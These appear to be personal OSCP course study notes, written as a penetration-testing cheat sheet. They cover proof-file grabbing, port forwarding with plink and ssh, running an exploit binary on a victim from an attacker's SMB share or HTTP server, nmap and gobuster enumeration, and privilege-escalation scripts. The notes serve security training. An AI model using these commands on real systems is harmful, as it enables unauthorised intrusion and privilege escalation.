Welcome to my learning notes for OSCP by OffensiveSecurity. I will update the metrials here during my 30 days course time.
hostname && whoami && type C:\Documents and Settings\Administrator\Desktop\proof.txt && ipconfig /all
hostname && whoami && cat /root/proof.txt && /sbin/ifconfig
Find running service which are listening to loopback only (i.e., or LISTENING/LISTEN in thier status):
netstat -ano
For example, if MySQL found listen locally on 3306 we can use plink.exe to prefrom port forward to our machine:
C:\Windows\Temp> plink.exe -l root -pw toor -R 3306:
Then in kali you could interact with database locally:
root@kali:~/#: mysql -u root -p
The plink.exe could be found here: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Use Local port forwarding technqiue with ssh command to as following:
alice@vcitimmachine:~/#: ssh -L 3306: root@
There are many techniques such as Remote port forwarding, Dynamic port forwarding and SSHuttle tool which might be useful for some cases :)
If if had a remote dektop machine I used the following command to mount share folder:
root@kali:~/#: rdesktop -r disk:share=/home/bayo/store
In kali use Impacket to create local SMB Share:
root@kali:~/#: python /usr/share/impacket/examples/smbserver.py MyShare /
On victim machine execute my payload via SMB:
C:\> \\\MyShare\exploit_kernerl.exe
On my kali machine, start the Python SimpleHTTPServer on port 80:
root@kali:~/#: python -m SimpleHTTPServer 8080
Then use powershell on victim machine / wget in linux to download my exploit.
- Ports & Services Enumeration using NMAP
root@kali:~/#: nmap -sV -sC -p- <IP>
root@kali:~/#: nmap -sU --top-ports=50 <IP>
root@kali:~/#: nmap --script smb-vuln-* <IP>
root@kali:~/#: nmap -sV -T4 -p- <IP> (Quick method)
- Enumerate web application
root@kali:~/#: gobuster dir -u <url> -w /usr/share/wordlist/directory-2.3-meduim.txt
root@kali:~/#: nikito -u <url>
- Post Exploition
After gaining inital acsses to shell and prompt TTY shell, then running one of the following script to enumrate:
- Powerup - /~https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- JAWS - /~https://github.com/411Hall/JAWS
- LinEnum.sh - /~https://github.com/rebootuser/LinEnum
- LSE - /~https://github.com/diego-treitos/linux-smart-enumeration
If none of them works, move to manully search.
- Priviliage esclation
Depend on the attack vector preform priviliage esclation.